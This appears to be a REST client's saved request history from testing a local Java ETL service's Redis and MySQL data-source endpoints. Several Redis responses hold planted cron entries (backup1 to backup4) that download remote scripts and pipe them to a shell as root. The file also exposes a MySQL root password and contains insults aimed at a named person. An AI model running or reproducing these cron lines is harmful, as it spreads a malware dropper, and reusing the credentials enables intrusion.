status\\u003d500).\\u003c/div\\u003e\\u003c/body\\u003e\\u003c/html\\u003e\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":22.0},\"time\":{\"hour\":12.0,\"minute\":39.0,\"second\":36.0,\"nano\":4.477235E8}}}],\"/testDatabaseRedis\":[{\"url\":\"http://localhost:8886/testDatabaseRedis\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"url\\\": \\\"115.159.33.152\\\",\\n \\\"port\\\": 6379\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": \\\"操作成功\\\",\\n \\\"data\\\": \\\"PONG\\\"\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":9.0,\"minute\":6.0,\"second\":59.0,\"nano\":5.613751E8}}},{\"url\":\"http://localhost:8886/testDatabaseRedis\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"url\\\": \\\"115.159.33.152\\\",\\n \\\"port\\\": 6379\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": \\\"操作成功\\\",\\n \\\"data\\\": \\\"PONG\\\"\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":9.0,\"minute\":7.0,\"second\":8.0,\"nano\":5.933406E8}}},{\"url\":\"http://localhost:8886/testDatabaseRedis\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"url\\\": \\\"115.159.33.152\\\",\\n \\\"port\\\": 6379\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": \\\"操作成功\\\",\\n \\\"data\\\": \\\"PONG\\\"\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":9.0,\"minute\":7.0,\"second\":9.0,\"nano\":4684400.0}}},{\"url\":\"http://localhost:8886/testDatabaseRedis\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"url\\\": \\\"115.159.33.152\\\",\\n \\\"port\\\": 6379\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": \\\"操作成功\\\",\\n \\\"data\\\": \\\"PONG\\\"\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":9.0,\"minute\":7.0,\"second\":9.0,\"nano\":1.534124E8}}},{\"url\":\"http://localhost:8886/testDatabaseRedis\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"url\\\": \\\"115.159.33.152\\\",\\n \\\"port\\\": 6379\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": \\\"操作成功\\\",\\n \\\"data\\\": \\\"PONG\\\"\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":9.0,\"minute\":7.0,\"second\":9.0,\"nano\":3.243269E8}}},{\"url\":\"http://localhost:8886/testDatabaseRedis\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"url\\\": \\\"115.159.33.152\\\",\\n \\\"port\\\": 6379\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": \\\"操作成功\\\",\\n \\\"data\\\": \\\"PONG\\\"\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":9.0,\"minute\":7.0,\"second\":9.0,\"nano\":4.205902E8}}},{\"url\":\"http://localhost:8886/testDatabaseRedis\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"url\\\": \\\"115.159.33.152\\\",\\n \\\"port\\\": 6379\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": \\\"操作成功\\\",\\n \\\"data\\\": \\\"PONG\\\"\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":9.0,\"minute\":7.0,\"second\":9.0,\"nano\":8.750723E8}}},{\"url\":\"http://localhost:8886/testDatabaseRedis\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"url\\\": \\\"115.159.33.152\\\",\\n \\\"port\\\": 6379\\n}\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8886/testDatabaseRedis\\n\\n{\\\"code\\\":500,\\\"msg\\\":\\\"java.net.SocketTimeoutException: Read timed out\\\",\\\"data\\\":null}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":9.0,\"minute\":7.0,\"second\":10.0,\"nano\":7.482971E8}}},{\"url\":\"http://localhost:8886/testDatabaseRedis\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"url\\\": \\\"115.159.33.152\\\",\\n \\\"port\\\": 6379\\n}\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8886/testDatabaseRedis\\n\\n{\\\"code\\\":500,\\\"msg\\\":\\\"java.net.SocketTimeoutException: Read timed out\\\",\\\"data\\\":null}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":9.0,\"minute\":7.0,\"second\":11.0,\"nano\":5.95004E8}}},{\"url\":\"http://localhost:8886/testDatabaseRedis\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"url\\\": \\\"115.159.33.152\\\",\\n \\\"port\\\": 6379\\n}\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8886/testDatabaseRedis\\n\\n{\\\"code\\\":500,\\\"msg\\\":\\\"java.net.SocketTimeoutException: Read timed out\\\",\\\"data\\\":null}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":9.0,\"minute\":7.0,\"second\":11.0,\"nano\":9.369015E8}}},{\"url\":\"http://localhost:8886/testDatabaseRedis\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"url\\\": \\\"43.142.12.243\\\",\\n \\\"port\\\": 6379\\n}\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8886/testDatabaseRedis\\n\\n{\\\"code\\\":500,\\\"msg\\\":\\\"java.net.SocketTimeoutException: Read timed out\\\",\\\"data\\\":null}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":9.0,\"minute\":12.0,\"second\":31.0,\"nano\":4.076203E8}}},{\"url\":\"http://localhost:8886/testDatabaseRedis\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"url\\\": \\\"43.142.12.243\\\",\\n \\\"port\\\": 6379\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": \\\"操作成功\\\",\\n \\\"data\\\": \\\"PONG\\\"\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":9.0,\"minute\":12.0,\"second\":37.0,\"nano\":8.445392E8}}},{\"url\":\"http://localhost:8886/testDatabaseRedis\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"url\\\": \\\"43.142.12.243\\\",\\n \\\"port\\\": 6379\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": \\\"操作成功\\\",\\n \\\"data\\\": \\\"PONG\\\"\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":9.0,\"minute\":24.0,\"second\":36.0,\"nano\":6.85336E8}}},{\"url\":\"http://localhost:8886/testDatabaseRedis\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"url\\\": \\\"43.142.12.243\\\",\\n \\\"port\\\": 6379\\n}\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8886/testDatabaseRedis\\n\\n{\\\"code\\\":500,\\\"msg\\\":\\\"Could not get a resource from the pool\\\",\\\"data\\\":null}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":9.0,\"minute\":27.0,\"second\":26.0,\"nano\":6.120915E8}}},{\"url\":\"http://localhost:8886/testDatabaseRedis\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"url\\\": \\\"43.142.12.243\\\",\\n \\\"port\\\": 6379\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": \\\"操作成功\\\",\\n \\\"data\\\": \\\"PONG\\\"\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":9.0,\"minute\":27.0,\"second\":29.0,\"nano\":9.364153E8}}},{\"url\":\"http://localhost:8886/testDatabaseRedis\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"url\\\": \\\"43.142.12.243\\\",\\n \\\"port\\\": 6379\\n}\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8886/testDatabaseRedis\\n\\n{\\\"code\\\":500,\\\"msg\\\":\\\"java.net.SocketTimeoutException: Read timed out\\\",\\\"data\\\":null}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":9.0,\"minute\":28.0,\"second\":21.0,\"nano\":5.485602E8}}},{\"url\":\"http://localhost:8886/testDatabaseRedis\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"url\\\": \\\"43.142.12.243\\\",\\n \\\"port\\\": 6379\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": \\\"操作成功\\\",\\n \\\"data\\\": \\\"PONG\\\"\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":9.0,\"minute\":28.0,\"second\":31.0,\"nano\":1.253541E8}}},{\"url\":\"http://localhost:8886/testDatabaseRedis\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"url\\\": \\\"43.142.12.243\\\",\\n \\\"port\\\": 6379\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": \\\"操作成功\\\",\\n \\\"data\\\": \\\"PONG\\\"\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":9.0,\"minute\":29.0,\"second\":20.0,\"nano\":5.833513E8}}},{\"url\":\"http://localhost:8886/testDatabaseRedis\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"url\\\": \\\"43.142.12.243\\\",\\n \\\"port\\\": 6379\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": \\\"操作成功\\\",\\n \\\"data\\\": {\\n \\\"丑逼\\\": \\\"丑死了\\\",\\n \\\"backup1\\\": \\\"\\\\n\\\\n\\\\n*/2 * * * * root echo Y2QxIGh0dHA6Ly9zLm5hLWNzLmNvbS9iMmY2MjgvYi5zaAo\\u003d|base64 -d|bash|bash \\\\n\\\\n\\\",\\n \\\"驼背\\\": \\\"身材不好\\\",\\n \\\"笨比\\\": \\\"笨笨\\\",\\n \\\"喜欢造谣\\\": \\\"乱让人认错\\\",\\n \\\"美女\\\": \\\"看这里\\\",\\n \\\"迷之自信\\\": \\\"啥也不行总觉得自给行\\\",\\n \\\"内八\\\": \\\"丑逼\\\",\\n \\\"暴力狂\\\": \\\"老揍我\\\",\\n \\\"自私自利\\\": \\\"什么都舍不得\\\",\\n \\\"死人\\\": \\\"装死人\\\",\\n \\\"----姚婷婷十宗罪---\\\": \\\"丑人多作怪\\\",\\n \\\"backup4\\\": \\\"\\\\n\\\\n\\\\n@hourly python -c \\\\\\\"import urllib2; print urllib2.urlopen(\\u0027http://\\\\\\\\\\\\\\\\s.n\\\\\\\\a-c\\\\\\\\s.c\\\\\\\\om/t.sh\\u0027).read()\\\\\\\" \\u003e.1;chmod +x .1;./.1\\\\n\\\\n\\\",\\n \\\"backup2\\\": \\\"\\\\n\\\\n\\\\n*/3 * * * * root echo d2dldCAtcSAtTy0gaHR0cDovL3MubmEtY3MuY29tL2IyZjYyOC9iLnNoCg\\u003d\\u003d|base64 -d|bash|bash\\\\n\\\\n\\\",\\n \\\"backup3\\\": \\\"\\\\n\\\\n\\\\n*/4 * * * * root echo Y3VybCBodHRwOi8vcy5uYS1jcy5jb20vYjJmNjI4L2Iuc2gK|base64 -d|bash|bash\\\\n\\\\n\\\",\\n \\\"傻子\\\": \\\"装傻充楞\\\"\\n }\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":9.0,\"minute\":33.0,\"second\":12.0,\"nano\":6.403661E8}}},{\"url\":\"http://localhost:8886/testDatabaseRedis\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"url\\\": \\\"115.159.33.152\\\",\\n \\\"port\\\": 6379\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": \\\"操作成功\\\",\\n \\\"data\\\": {\\n \\\"backup1\\\": \\\"\\\\n\\\\n\\\\n*/2 * * * * root cd1 -fsSL http://en2an.top/cleanfda/init.sh | sh\\\\n\\\\n\\\",\\n \\\"backup4\\\": \\\"\\\\n\\\\n\\\\n*/5 * * * * root wd1 -q -O- http://45.83.123.29/cleanfda/init.sh | sh\\\\n\\\\n\\\",\\n \\\"backup2\\\": \\\"\\\\n\\\\n\\\\n*/3 * * * * root wget -q -O- http://en2an.top/cleanfda/init.sh | sh\\\\n\\\\n\\\",\\n \\\"backup3\\\": \\\"\\\\n\\\\n\\\\n*/4 * * * * root curl -fsSL http://45.83.123.29/cleanfda/init.sh | sh\\\\n\\\\n\\\"\\n }\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":25.0},\"time\":{\"hour\":19.0,\"minute\":33.0,\"second\":20.0,\"nano\":8.694215E8}}}],\"/findDataSource\":[{\"url\":\"http://localhost:8886/findDataSource\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"pageNum\\\": 1,\\n \\\"pageSize\\\": 3,\\n \\\"dataSourceDescribe\\\": \\\"\\\",\\n \\\"dataSourceType\\\": 1\\n}\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8886/findDataSource\\n\\n{\\\"code\\\":500,\\\"msg\\\":\\\"Invalid bound statement (not found): com.etl.data.source.server.mapper.DataSourceBaseMapper.selectJoinPage\\\",\\\"data\\\":null}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":25.0},\"time\":{\"hour\":18.0,\"minute\":40.0,\"second\":8.0,\"nano\":6.552401E8}}},{\"url\":\"http://localhost:8886/findDataSource\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"pageNum\\\": 1,\\n \\\"pageSize\\\": 3,\\n \\\"dataSourceDescribe\\\": \\\"\\\",\\n \\\"dataSourceType\\\": 1\\n}\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8886/findDataSource\\n\\n{\\\"code\\\":500,\\\"msg\\\":\\\"Invalid bound statement (not found): com.etl.data.source.server.mapper.DataSourceBaseMapper.selectJoinPage\\\",\\\"data\\\":null}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":25.0},\"time\":{\"hour\":18.0,\"minute\":40.0,\"second\":51.0,\"nano\":1.20984E8}}},{\"url\":\"http://localhost:8886/findDataSource\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"pageNum\\\": 1,\\n \\\"pageSize\\\": 3,\\n\\n}\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8886/findDataSource\\n\\n{\\\"code\\\":500,\\\"msg\\\":\\\"JSON parse error: Unexpected character (\\u0027}\\u0027 (code 125)): was expecting double-quote to start field name; nested exception is com.fasterxml.jackson.core.JsonParseException: Unexpected character (\\u0027}\\u0027 (code 125)): was expecting double-quote to start field name\\\\n at [Source: (org.springframework.util.StreamUtils$NonClosingInputStream); line: 5, column: 2]\\\",\\\"data\\\":null}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":25.0},\"time\":{\"hour\":18.0,\"minute\":47.0,\"second\":30.0,\"nano\":8.920414E8}}},{\"url\":\"http://localhost:8886/findDataSource\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"pageNum\\\": 1,\\n \\\"pageSize\\\": 3\\n\\n}\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8886/findDataSource\\n\\n{\\\"code\\\":500,\\\"msg\\\":\\\"Invalid bound statement (not found): com.etl.data.source.server.mapper.DataSourceBaseMapper.selectJoinPage\\\",\\\"data\\\":null}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":25.0},\"time\":{\"hour\":18.0,\"minute\":47.0,\"second\":40.0,\"nano\":3.318936E8}}},{\"url\":\"http://localhost:8886/findDataSource\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"pageNum\\\": 1,\\n \\\"pageSize\\\": 3\\n\\n}\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8886/findDataSource\\n\\n{\\\"code\\\":500,\\\"msg\\\":\\\"Invalid bound statement (not found): com.etl.data.source.server.mapper.DataSourceBaseMapper.selectJoinPage\\\",\\\"data\\\":null}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":25.0},\"time\":{\"hour\":18.0,\"minute\":54.0,\"second\":13.0,\"nano\":1.009445E8}}},{\"url\":\"http://localhost:8886/findDataSource\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"pageNum\\\": 1,\\n \\\"pageSize\\\": 3,\\n \\\"dataSourceDescribe\\\": \\\"\\\",\\n \\\"dataSourceType\\\": 1\\n}\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8886/findDataSource\\n\\n{\\\"code\\\":500,\\\"msg\\\":\\\"Invalid bound statement (not found): com.etl.data.source.server.mapper.DataSourceBaseMapper.selectJoinPage\\\",\\\"data\\\":null}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":25.0},\"time\":{\"hour\":19.0,\"minute\":0.0,\"second\":34.0,\"nano\":6.117732E8}}},{\"url\":\"http://localhost:8886/findDataSource\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"pageNum\\\": 1,\\n \\\"pageSize\\\": 3,\\n \\\"dataSourceDescribe\\\": \\\"\\\",\\n \\\"dataSourceType\\\": 1\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": null,\\n \\\"data\\\": [\\n {\\n \\\"id\\\": 1,\\n \\\"dataSourceId\\\": 1,\\n \\\"dataSourceDescribe\\\": \\\"1\\\",\\n \\\"linkAddress\\\": \\\"1\\\",\\n \\\"userName\\\": \\\"1\\\",\\n \\\"password\\\": \\\"1\\\",\\n \\\"connectionPort\\\": 1,\\n \\\"connectionDatabaseName\\\": \\\"1\\\",\\n \\\"extraConfig\\\": \\\"1\\\",\\n \\\"status\\\": 1,\\n \\\"remark\\\": \\\"1\\\",\\n \\\"dataSourceType\\\": 1,\\n \\\"dataSourceTypeName\\\": \\\"mysql\\\"\\n }\\n ]\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":25.0},\"time\":{\"hour\":19.0,\"minute\":6.0,\"second\":32.0,\"nano\":4.85264E7}}},{\"url\":\"http://localhost:8886/findDataSource\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"pageNum\\\": 1,\\n \\\"pageSize\\\": 3,\\n \\\"dataSourceDescribe\\\": \\\"\\\",\\n \\\"dataSourceType\\\": 1\\n}\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8886/findDataSource\\n\\nConnectException: Connection refused: connect\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":26.0},\"time\":{\"hour\":16.0,\"minute\":55.0,\"second\":8.0,\"nano\":6.355759E8}}},{\"url\":\"http://localhost:8886/findDataSource\",\"header\":[{\"is_checked\":1,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"pageNum\\\": 1,\\n \\\"pageSize\\\": 3,\\n \\\"dataSourceDescribe\\\": \\\"\\\",\\n \\\"dataSourceType\\\": 1\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": null,\\n \\\"data\\\": [\\n {\\n \\\"id\\\": 1,\\n \\\"dataSourceDescribe\\\": \\\"111\\\",\\n \\\"linkAddress\\\": \\\"43.142.12.243\\\",\\n \\\"userName\\\": \\\"root\\\",\\n \\\"password\\\": \\\"ytt@123\\\",\\n \\\"connectionPort\\\": 3306,\\n \\\"connectionDatabaseName\\\": \\\"11\\\",\\n \\\"extraConfig\\\": \\\"11\\\",\\n \\\"status\\\": 2,\\n \\\"remark\\\": \\\"1\\\",\\n \\\"dataSourceType\\\": 1,\\n \\\"dataSourceTypeName\\\": \\\"mysql\\\"\\n }\\n ]\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024,\"month\":6,\"day\":26},\"time\":{\"hour\":16,\"minute\":56,\"second\":41,\"nano\":359448700}}}],\"/addMysqlDataSource\":[{\"url\":\"http://localhost:8886/addMysqlDataSource\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"id\\\": 1,\\n \\\"dataSourceId\\\": 1,\\n \\\"dataSourceDescribe\\\": \\\"\\\",\\n \\\"linkAddress\\\": \\\"\\\",\\n \\\"userName\\\": \\\"\\\",\\n \\\"password\\\": \\\"\\\",\\n \\\"connectionPort\\\": 1,\\n \\\"connectionDatabaseName\\\": \\\"\\\",\\n \\\"extraConfig\\\": \\\"\\\",\\n \\\"status\\\": 1,\\n \\\"remark\\\": \\\"\\\",\\n \\\"dataSourceType\\\": 1,\\n \\\"dataSourceTypeName\\\": \\\"\\\"\\n}\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8886/addMysqlDataSource\\n\\n{\\\"code\\\":500,\\\"msg\\\":\\\"数据源用户名不能为空, 数据源驱动不能为空, 数据源描述不能为空, 数据源连接地址不能为空, 数据源密码不能为空, 